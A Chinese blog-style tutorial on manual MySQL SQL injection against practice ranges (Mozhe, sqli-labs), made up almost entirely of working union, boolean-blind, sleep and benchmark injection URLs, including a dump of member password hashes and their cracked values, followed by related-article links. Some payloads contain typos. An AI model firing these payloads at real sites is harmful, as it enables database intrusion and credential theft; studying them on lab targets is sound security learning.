Mysql显错注入

1.判断注入类型为字符型:http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=1 --+
2.判断字段为4:http://219.153.49.228:43074/new_list.php?id=tingjigonggao' order by 4--+
3.union报错:http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=2 union select 1,2,3,4 --+
4.爆当前数据库和版本:http://219.153.49.228:43074/new_list.php?id=tingjigonggao' and 1=2 union select 1,database(),version(),4 --+
数据库:mozhe_discuz_stormgroup
版本:10.2.15-MariaDB-log
5.继续判断其它数据库:union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit *,1(*为0~n,直到页面返回为空)
数据库
information_schema
mozhe_discuz_stormgroup
mysql
performance_schema
test
6.爆mozhe_discuz_stormgroup库中表:union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='需要查的数据库名' limit *,1(*为0~n,直到页面返回为空)
notice
stormgroup_member
7.爆stormgroup_member表中字段:union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_discuz_stormgroup' and TABLE_NAME='stormgroup_member' limit *,1(*为0~n,直到页面返回为空)
id
name
password
status
8.爆字段中的数据:union select 1,CONCAT(id,'-',name,'-',password,'-',status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit *,1(*为0~n,直到页面返回为空)
1-mozhe-46e65165c36b3167530b4837a605f086-1
md5解密后:1-mozhe-389699-1
2-mozhe-356f589a7df439f6f744ff19bb8092c0-0
md5解密后:2-mozhe-dsan13-0
注:status状态为0,账户不可用

Mysql布尔值盲注

1.数据库长度:http://219.153.49.228:42875/new_list.php?id=1 and length(database())=10 --+
2.爆数据库名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),1,1))=115 --+  s  
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),2,1))=116 --+  t
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),3,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),4,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),5,1))=109--+   m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),6,1))=103--+   g
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),7,1))=114--+   r
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),8,1))=111--+   o
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),9,1))=117--+   u
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select database()),10,1))=112--+  p
数据库名:stormgroup

3.爆表名:
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),1,1))=109 --+           m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),2,1))=101 --+            e

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),3,1))=109 --+            m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),4,1))=98 --+              b

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),5,1))=101 --+           e

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),6,1))=114 --+           r

表一:member

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from     information_schema.tables where table_schema='stormgroup' limit 1,1),1,1))=110 --+          n

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),2,1))=111 --+          o

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),3,1))=116 --+          t

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),4,1))=105 --+          i

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),5,1))=99 --+           c

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 1,1),6,1))=101 --+         e

表二:notice

3.爆字段:
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+                 长度为4

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),1,1))=110 --+             n
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=97 --+               a
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=109 --+             m
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select dump from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1),2,1))=101 --+             e
字段一:name

http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 1,1))=8 --+

字段二:猜想为password

字段三
http://219.153.49.228:42875/new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 2,1))=6 --+   长度为6,猜想字段名为status(显示1账户可用,0不可用)

4.爆字段内容:
先爆status字段内容:
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 0,1))=1 --+          长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 0,1),1,1))=48 --+         0
账户状态为0不可用

http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(status) from stormgroup.member limit 1,1))=1 --+           长度为一
http://219.153.49.228:42875/new_list.php?id=1 andascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=49 --+         1
 账户状态为1可用

name字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(name) from stormgroup.member limit 1,1))=5 --+             长度为5
http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),1,1))=109 --+     m

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),2,1))= 111--+      o

http://219.153.49.228:42875/new_list.php?id=1 and ascii(substr((select CONCAT(name) from stormgroup.member limit 1,1),3,1))=122 --+       z
.......猜想库名为mozhe

password字段
http://219.153.49.228:42875/new_list.php?id=1 and length((select CONCAT(password) from stormgroup.member limit 1,1))=32 --+            长度为32。。。。晕,太多了,上sqlmap,拿32位md5值。

Mysql延时注入

判断是否存在注入

http://10.0.0.21/yanci.php?username=root' and sleep(5)%23

或者

http://10.0.0.21/yanci.php?username=root' and sleep(5) and 'xRsl'='xRsl#

Sleep函数注入查询当前数据库名的第一个符号

http://10.0.0.21/yanci.php?username=root' and If(ascii(substr(database(),1,1))=114,1,sleep(5))#

替换database()为其他符号时可以查询其他信息,如:

1.爆数据库的版本长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(length((version()))=6,sleep(10),1)--+

2.爆数据库版本的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(ascii(substr(version(),1,1))=53,sleep(10),1)--+

3.爆第一个数据库的长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(length((select schema_name from information_schema.schemata limit 0,1))=18,sleep(10),1)--+

4.爆第一个数据库的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(10),1)--+

这里通过改变limit后的值来确定第几个数据库,第一个数据库的下标为0,依次往后推就是其他的数据库

5.爆security数据库里的第四个表的长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),1)--+

6.爆security数据库里的第四个表的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),1)--+

7.爆security数据库里的users表的第二个字段长度

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1))=8,sleep(10),1)--+

8.爆security数据库里的users表的第二个字段的第一个字符

http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117,sleep(10),1)--+

9.爆security数据库里的users表的第二个字段的第一个数据的长度
http://127.0.0.1:6868/sqli-labs-master/Less-5/?id=1'and If(length((select username from security.users limit 0,1))=4,sleep(10),1)--+

Benchmark()函数基于时间延迟注入

BENCHMARK(count,expr) 函数重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0

1、判断注入点

http://127.0.0.1:4609/?id=1 and if(1=0,1, sleep(10)) --+

2、判断数据库版本第一个字符是否为 5 ?

http://127.0.0.1:4610/?id=1 and if(left(version(),1)=5,(select benchmark(10000000,md5(0x41))),1) --+

3、判断数据库连接用户名长度是否为 18?

http://127.0.0.1:4610/?id=1 and if(length(user())=18,(select benchmark(10000000,md5(0x41))),1) --+

4、判断用户名前18个字符是否为 sql_user@localhost ?

http://127.0.0.14610/?id=1 and if(left(user(),18)='sql_user@localhost',(select benchmark(10000000,md5(0x41))),1) --+

5、判断数据库名长度是否为 6?

http://127.0.0.1:4610/?id=1 and if(length(database())=6,(select benchmark(10000000,md5(0x41))),1) --+

6、判断数据库名第一个字符是否为 s?

http://127.0.0.14610/?id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+

依次类推......

--------------------------------------------------

7、判断表名长度是否为 4 ?

http://127.0.0.1:4610/?id=1 andif(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

8、判断表名第一个字符是否为 f ?

http://127.0.0.1:4610/?id=1 and if(left((select table_name from information_schema.tables wheretable_schema=database() limit 1,1),1)='f',(select benchmark(10000000,md5(0x41))),1) --+

依次类推......

--------------------------------------------------

9、判断列名长度是否为 4?

http://127.0.0.1:4610/?id=1 and if(length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1))=4,(select benchmark(10000000,md5(0x41))),1) --+

10、判断列名第一个字符是否为 f ?

http://127.0.0.1:4610/?id=1 and if(left((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),1)='f',(select benchmark(10000000,md5(0x41))),1) --+

依次类推......

--------------------------------------------------

11、判断字段内容值长度是否为 14?

http://127.0.0.1:4610/?id=1 and if(length((select flag from flag limit 0,1))=14,(select benchmark(10000000,md5(0x41))),1) --+

12、判断列名字段内容值第一位字符是否为 w ?

http://127.0.0.1:4610/?id=1 and if(left((select flag from flag limit 0,1),1)='w',(select benchmark(10000000,md5(0x41))),1) --+

或者

http://127.0.0.1:4610/?id=1 andif(ascii(substring((SELECT flag FROM flag),1,1))=119,(select benchmark(10000000,md5(0x41))),1) --+

Mysql常见注入的更多相关文章

  1. MYSQL手工注入(详细步骤)—— 待补充

    0x00 SQL注入的分类: (1)基于从服务器接收到的响应         ▲基于错误的 SQL 注入         ▲联合查询的类型         ▲堆查询注射         ▲SQL 盲注 ...

  2. MySQL手工注入学习-1

    MySQL手工注入学习 SQLi-labs 手工注入学习 以下是通过SLQi-labs平台的部分简单例题的手工注入过程 Less-1:union联合查询注入 页面提示:Please input the ...

  3. Mysql常见四种索引的使用

    提到MySQL优化,索引优化是必不可少的.其中一种优化方式 --索引优化,添加合适的索引能够让项目的并发能力和抗压能力得到明显的提升. 我们知道项目性能的瓶颈主要是在"查(select)&q ...

  4. mysql 常见的几个错误问题

    Mysql常见的几个错误问题及解决方法: 1.问题: mysql DNS反解:skip-name-resolve 错误日志有类似警告: 点击(此处)折叠或打开 120119 16:26:04 [War ...

  5. mysql常见优化,更多mysql,Redis,memcached等文章

    mysql常见优化 http://www.cnblogs.com/ggjucheng/archive/2012/11/07/2758058.html 更多mysql,Redis,memcached等文 ...

  6. MySQL常见错误类型

    MySQL常见错误类型:1005:创建表失败1006:创建数据库失败1007:数据库已存在,创建数据库失败1008:数据库不存在,删除数据库失败1009:不能删除数据库文件导致删除数据库失败1010: ...

  7. MYSQL常见出错mysql_errno()代码解析

    如题,今天遇到怎么一个问题, 在理论上代码是不会有问题的,但是还是报了如上的错误,把sql打印出來放到DB中却可以正常执行.真是郁闷,在百度里面 渡 了很久没有相关的解释,到时找到几个没有人回复的 & ...

  8. 启动、停止、重启 MySQL 常见的操作方法:

    启动.停止.重启 MySQL 常见的操作方法: 简单罗列 一.启动方式 1.使用 service 启动:service mysqld start 2.使用 mysqld 脚本启动:/etc/inint ...

  9. sql点滴41—mysql常见sql语法

    原文:sql点滴41-mysql常见sql语法 ALTER TABLE:添加,修改,删除表的列,约束等表的定义. 查看列:desc 表名; 修改表名:alter table t_book rename ...

随机推荐

  1. django中Template语言

    Template本身也有自己的语言和语法,用来处理简单的数据显示 常用语法 判断指令 {% if 条件 %}...{%endif%} {% if 条件 %}...{%elif 条件 %}...{%en ...

  2. 通过 Serverless 加速 Blazor WebAssembly

    Blazor ❤ Serverless 我正在开发 Ant Design 的 Blazor 版本,预览页面部署在 Github Pages 上,但是加载速度很不理想,往往需要 1 分钟多钟才完成. 项 ...

  3. 杭电-------2041超级楼梯(c语言写)

    /* 当未走的楼梯大于1时,可以选择走一步或者走两步,每次所做的选择相似, 符合分治法的特性,因此选择分治法,又测试用例有多组,为了避免多组 用例的重复计算,可用一个数组将已经知道的剩下的楼梯可以走的 ...

  4. 06_TypeScript泛型

    1.泛型的定义 泛型就是解决 类,接口 方法的复用性,以及对不特定数据的支持(类型校验). 2.泛型函数 //T 表示泛型,具体什么类型是调用这个方法的时候决定的, //T可以用其他大写字母表示,传入 ...

  5. 惊讶!缓存刚Put再Get居然获取不到?

    最近一直在老家远程办公,微信突然响了下,有同事说遇到了一个奇怪的问题,让我帮忙看下. 现象就是标题所说的缓存获取不到的问题,我一听感觉这个问题挺有意思的,决定一探究竟. 下面给出部分代码还原下案发现场 ...

  6. localStorage 存储

    localStorage 的优势 localStorage 拓展了 cookie 的 4K 限制. localStorage 会可以将第一次请求的数据直接存储到本地,这个相当于一个 5M 大小的针对于 ...

  7. MFC/QT 学习笔记(二)——MFC入门

    MFC以C++形式封装了Windows API //实践 编写MFC需要的头文件#include <afxwin.h> 程序执行流程: 实例化应用程序对象(有且只有一个) 执行程序入口函数 ...

  8. Elasticsearch之增加和删除索引

    增加索引 利用postMan工具发送restfulAPI添加索引库 请求方式为put代表添加 创建索引index时映射mapping 请求URL: 使用put发送http://localhost:92 ...

  9. Linux动态DMA映射

    1. 几种地址类型 虚拟地址 Linux内核使用的地址是虚拟地址,数据类型为void *.例如,kmalloc()和vmalloc()函数返回值就是虚拟地址. 物理地址 处理器真实地址总线上的地址,数 ...

  10. #《Essential C++》读书笔记# 第六章 以template进行编程

    练习题答案 练习6.1 试改写以下类,使它成为一个class template: class example { public: example(double min, double max); ex ...